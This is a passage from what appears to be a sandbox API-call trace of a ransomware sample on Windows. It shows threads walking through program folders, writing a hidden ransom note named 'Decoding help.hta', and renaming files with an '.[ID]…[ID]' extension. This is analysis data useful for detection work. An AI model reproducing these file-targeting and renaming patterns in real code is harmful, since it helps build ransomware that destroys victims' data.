nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.815] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0063.815] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0063.815] FindNextFileW (in: hFindFile=0x42cf198, lpFindFileData=0xf94fd30 | out: lpFindFileData=0xf94fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd690500, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x60af2a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd690500, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x19539, dwReserved0=0x0, dwReserved1=0x0, cFileName="EXPEDITN.ELM", cAlternateFileName="")) returned 1 Thread: id = 691 os_tid = 0xf14 [0054.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*.*", lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e28f0 [0054.465] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.465] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.465] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.465] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.465] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 1 [0054.465] lstrcmpW (lpString1=".", lpString2="BIN") returned -1 [0054.465] lstrcmpW (lpString1="..", lpString2="BIN") returned -1 [0054.465] lstrcmpiW (lpString1="windows", lpString2="BIN") returned 1 [0054.465] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*.*" [0054.465] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\*.*") returned 79 [0054.465] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\", lpString2="BIN" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN" [0054.465] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\*.*" [0054.465] GlobalMemoryStatus (in: lpBuffer=0xfacfd10 | out: lpBuffer=0xfacfd10) [0054.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11561460, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x608 [0054.467] CloseHandle (hObject=0x608) returned 1 [0054.467] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0xfacfd30 | out: lpFindFileData=0xfacfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdb7d6d00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdb7d6d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIN", cAlternateFileName="")) returned 0 [0054.467] FindClose (in: hFindFile=0x5e28f0 | out: hFindFile=0x5e28f0) returned 1 Thread: id = 692 os_tid = 0xf18 [0054.466] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*.*", lpFindFileData=0x1719fd30 | out: lpFindFileData=0x1719fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8410 [0062.541] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.542] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0x1719fd30 | out: lpFindFileData=0x1719fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.542] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.542] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.542] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0x1719fd30 | out: lpFindFileData=0x1719fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ee600, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35ee600, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x109d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ICE.ELM", cAlternateFileName="")) returned 1 Thread: id = 693 os_tid = 0xf1c [0054.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*", lpFindFileData=0x196dfd30 | out: lpFindFileData=0x196dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0055.487] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.487] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x196dfd30 | out: lpFindFileData=0x196dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.487] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.487] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0x196dfd30 | out: lpFindFileData=0x196dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0055.488] FindClose (in: hFindFile=0x5d88d0 | out: hFindFile=0x5d88d0) returned 1 Thread: id = 694 os_tid = 0xf20 [0054.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*.*", lpFindFileData=0x1999fd30 | out: lpFindFileData=0x1999fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8690 [0062.541] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.541] FindNextFileW (in: hFindFile=0x5d8690, lpFindFileData=0x1999fd30 | out: lpFindFileData=0x1999fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.541] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.541] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.541] FindNextFileW (in: hFindFile=0x5d8690, lpFindFileData=0x1999fd30 | out: lpFindFileData=0x1999fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4901300, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x539538d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4901300, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x184e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDUST.ELM", cAlternateFileName="")) returned 1 Thread: id = 695 os_tid = 0xf24 [0054.468] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*", lpFindFileData=0x19d5fd30 | out: lpFindFileData=0x19d5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e28f0 [0054.468] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.468] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x19d5fd30 | out: lpFindFileData=0x19d5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.468] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.468] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.468] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x19d5fd30 | out: lpFindFileData=0x19d5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar.html", cAlternateFileName="")) returned 1 [0054.468] lstrcpyW (in: lpString1=0x108001f8, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0054.468] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 76 [0054.468] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" [0054.469] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0054.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x608 [0054.469] WriteFile (in: hFile=0x608, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x19d5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x19d5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.469] CloseHandle (hObject=0x608) returned 1 [0058.370] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.370] lstrcmpiW (lpString1="Decoding help.hta", lpString2="calendar.html") returned 1 [0058.370] lstrlenW (lpString="calendar.html") returned 13 [0058.370] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.370] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 76 [0058.370] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="calendar.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" [0058.370] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" [0058.370] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.370] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\calendar.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\calendar.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.371] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x19d5fd30 | out: lpFindFileData=0x19d5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0058.371] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0058.371] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0058.371] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0058.371] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.371] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 76 [0058.371] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css" [0058.371] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*.*" [0058.371] GlobalMemoryStatus (in: lpBuffer=0x19d5fd10 | out: lpBuffer=0x19d5fd10) [0058.371] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11304238, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb94 [0058.372] CloseHandle (hObject=0xb94) returned 1 [0058.372] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x19d5fd30 | out: lpFindFileData=0x19d5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0058.372] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.372] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 76 [0058.372] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" [0058.372] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.372] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.372] lstrlenW (lpString="gadget.xml") returned 10 [0058.372] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.372] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 76 [0058.372] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" [0058.372] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" [0058.372] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.372] FindNextFileW (in: hFindFile=0x5e28f0, lpFindFileData=0x19d5fd30 | out: lpFindFileData=0x19d5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0058.372] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0058.373] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0058.373] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0058.373] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0058.373] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned 76 [0058.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js" [0058.373] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*.*" [0058.373] GlobalMemoryStatus (in: lpBuffer=0x19d5fd10 | out: lpBuffer=0x19d5fd10) [0058.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108e05f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb94 [0058.374] CloseHandle 